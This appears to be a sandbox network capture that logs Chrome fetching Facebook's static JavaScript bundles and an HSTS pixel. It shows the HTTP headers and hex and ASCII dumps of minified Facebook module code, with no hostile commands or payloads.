                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC581OUTGET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: dPGOafzutFE7nyQyK+c4bg==
                                                                                                                                                                                                                                Expires: Sun, 21 Sep 2025 01:05:36 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: veIQ2j6vFpWrYx0CayQUv+wmoQYSCalcJrcUPLvbfOOu08bjABteji8aFgKlb1c6Ss1itdvorXrtQe2stQqJ7Q==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10408
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC10407INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 56 39 76 64 59 43 6f 6c 63 34 6b 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 72 65 61 63 74 2d 30 2e 30 2e 30 22 2c 5b 22 52 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 22 64 65 66 61 75 6c 74 22 69 6e 20 61 3f 61 5b 22 64 65 66 61 75 6c 74 22 5d 3a 61 7d 76 61 72 20 67 3d 61 28 62 28 22 52 65 61 63 74 22 29 29 3b 64 3d 7b 7d 3b 76 61
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/V9vdYColc4k/ */__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};va


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                43192.168.2.449791157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC581OUTGET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: /HmydUFwcPwAUig9l7tbMQ==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 11:53:55 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: QhR1YiV7T8klaasjelQF27hHrirwdOba7Q+YOT0KDr0+HuIU3C7xCU1K4OJRY++HWAk19KiqnMLgqULFpjJI6A==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 59956
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC15873INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 43 4c 53 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 28 28 62 3d 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 28 63 3d 62 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 69 6e 63 6c 75 64 65 73 29 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 2e 69 6e 63 6c 75 64 65 73 28 22 6c 61 79 6f 75 74 2d 73
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-s
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6c 61 73 73 4e 61 6d 65 2c 65 6c 65 6d 65 6e 74 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 74 61 67 4e 61 6d 65 2c 73 69 7a 65 3a 61 2e 73 69 7a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 61 2e 73 74 61 72 74 54 69 6d 65 2c 75 72 6c 3a 61 2e 75 72 6c 7d 7d 7d 66 2e 67 65 74 4c 43 50 43 61 6c 6c 62 61 63 6b 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 52 65 73 6f 75 72 63 65 44 6f 77 6e 6c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74
                                                                                                                                                                                                                                Data Ascii: =null?null:{className:(c=a.element)==null?void 0:c.className,element:(c=a.element)==null?void 0:c.tagName,size:a.size,timestamp:a.startTime,url:a.url}}}f.getLCPCallback=a}),66);__d("ResourceDownloadLogger",["performance"],(function(a,b,c,d,e,f,g){"use st
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 70 50 69 78 65 6c 73 3a 30 2c 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 3a 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 2e 76 61 6c 75 65 73 28 29 29 2c 65 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 32 2c 66 69 6e 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 24 31 32 2c 69 6d 67 4e 75 6d 3a 30 2c 69 6d 67 50 69 78 65 6c 73 3a 30 2c 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 2c 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 3a 74 68 69 73 2e 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 2c 6c 6f 61 64 69 6e 67 45 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 35 2c 6d 61 72 6b 65 72 50 6f 69 6e 74 73 3a 74 68 69 73 2e 6d 61 72 6b 65 72 50 6f 69 6e 74 73 2c 6e 61 76 43
                                                                                                                                                                                                                                Data Ascii: pPixels:0,cssBgElements:Array.from(this.cssBgElements.values()),elements:this.$2,finalScrollY:this.$12,imgNum:0,imgPixels:0,initialScrollY:this.initialScrollY,interactionType:this.interactionType,loadingElements:this.$5,markerPoints:this.markerPoints,navC
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC11314INData Raw: 65 74 28 61 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 2e 63 61 6c 6c 62 61 63 6b 28 29 3b 62 2e 65 78 65 63 75 74 65 4f 6e 63 65 26 26 6a 2e 24 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 54 72 61 63 69 6e 67 24 70 5f 38 5b 22 64 65 6c 65 74 65 22 5d 28 61 29 7d 29 7d 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 3d 6e 65 77 28 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 29 28 6a 2e 6d 75 74 61 74 69 6f 6e 52 65 63 6f 72 64 48 61 6e 64 6c 65 72 29 29 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6c 6f 61 64 69 6e
                                                                                                                                                                                                                                Data Ascii: et(a);if(b==null)return;b.callback();b.executeOnce&&j.$VisualCompletionTracing$p_8["delete"](a)})};d("WebAPIs").MutationObserver&&(j.mutationObserver=new(d("WebAPIs").MutationObserver)(j.mutationRecordHandler));d("WebAPIs").IntersectionObserver&&(j.loadin


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                44192.168.2.449796157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC374OUTGET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 8rx6czt+CAsqvWjnRr01qQ==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: NqxNkaaPvHKjB5oK25PeK2OQMYrY62oYSje8P53AMK+34T915jE8z+6thYh++XGxiNYLCgkwrhII8zjcRfOh0Q==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=110, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 49300
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 2c 5b 22 41 72 62 69 74 65 72 22 2c 22 67 75 69 64 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 61 72 62 69 74 65 72 24 22 2b 63 28 22 67 75 69 64 22 29 28 29 2c 69 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 61 3d 7b 5f 67 65 74 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 74 68 69 73 2c 68 29 3f 74 68 69 73 5b 68 5d 3a 74 68 69 73 5b 68 5d 3d 6e 65 77 28 63 28 22 41 72 62 69 74 65 72 22 29 29 28 29 7d 2c 69 6e 66 6f 72 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 34 37 2c 63 2c 74 79 70 65 6f 66 20 63 29 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 31 3f 5b 69 2c 63 2c 22 2a 22 5d 3a 5b 63 2c 22 2a 22 5d 7d 2c 67 65 74 47 65 6e 64 65 72 56 61 72 69 61 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 62 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 42 49 54 4d 41 53 4b 5f 47 45 4e 44 45 52 7c 7c 67 28 30 2c 31 31 36 34 38 2c 61 2c 74 79 70 65 6f 66 20 61 29 3b 72 65 74 75 72 6e 5b 61 2c 22 2a 22 5d 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 49 6d 70 6c 22
                                                                                                                                                                                                                                Data Ascii: 47,c,typeof c);return a===1?[i,c,"*"]:[c,"*"]},getGenderVariations:function(a){a&b("IntlVariations").BITMASK_GENDER||g(0,11648,a,typeof a);return[a,"*"]}};e.exports=a}),null);__d("IntlVariationResolver",["IntlVariationHoldout","IntlVariationResolverImpl"
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 62 3a 61 2e 73 65 72 69 61 6c 69 7a 65 72 29 3b 64 3d 63 2e 6c 65 6e 67 74 68 3e 30 3f 22 3f 22 3a 22 22 3b 62 3d 61 2e 66 72 61 67 6d 65 6e 74 21 3d 3d 22 22 3f 22 23 22 2b 61 2e 66 72 61 67 6d 65 6e 74 3a 22 22 3b 61 3d 61 2e 66 72 61 67 6d 65 6e 74 3d 3d 3d 22 22 26 26 61 2e 66 72 61 67 6d 65 6e 74 53 65 70 61 72 61 74 6f 72 3f 22 23 22 3a 22 22 3b 72 65 74 75 72 6e 22 22 2b 65 2b 66 2b 67 2b 68 2b 64 2b 63 2b 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 21 31 29 3b 69 66 28 21 64 26 26 28 65 7c 7c 75 28 61 29 29 29 7b 72 65 74 75 72 6e 28 64 3d 62 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 7d 72 65 74 75 72 6e 20 73 28 63 2c 66 29 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                Data Ascii: =null?b:a.serializer);d=c.length>0?"?":"";b=a.fragment!==""?"#"+a.fragment:"";a=a.fragment===""&&a.fragmentSeparator?"#":"";return""+e+f+g+h+d+c+a+b}function z(a,b,c,d,e,f){e===void 0&&(e=!1);if(!d&&(e||u(a))){return(d=b)!=null?d:""}return s(c,f)}function
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC660INData Raw: 61 73 68 3b 72 65 74 75 72 6e 20 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 6e 75 6c 6c 26 26 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 3d 22 4e 4f 5f 49 4e 4c 49 4e 45 22 3f 6e 65 77 28 63 28 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 22 29 29 28 62 2c 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 2c 64 2c 65 29 3a 63 28 22 46 62 74 52 65 73 75 6c 74 22 29 2e 67 65 74 28 61 29 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 69 73 53 74 72 69 6e 67 4e 75 6c 6c 4f 72 45 6d 70 74 79 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63
                                                                                                                                                                                                                                Data Ascii: ash;return c("FbtResultGK").inlineMode!=null&&c("FbtResultGK").inlineMode!=="NO_INLINE"?new(c("InlineFbtResult"))(b,c("FbtResultGK").inlineMode,d,e):c("FbtResult").get(a)}g["default"]=a}),98);__d("isStringNullOrEmpty",[],(function(a,b,c,d,e,f){"use stric


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                45192.168.2.449800157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC489OUTGET /security/hsts-pixel.gif HTTP/1.1
                                                                                                                                                                                                                                Host: facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
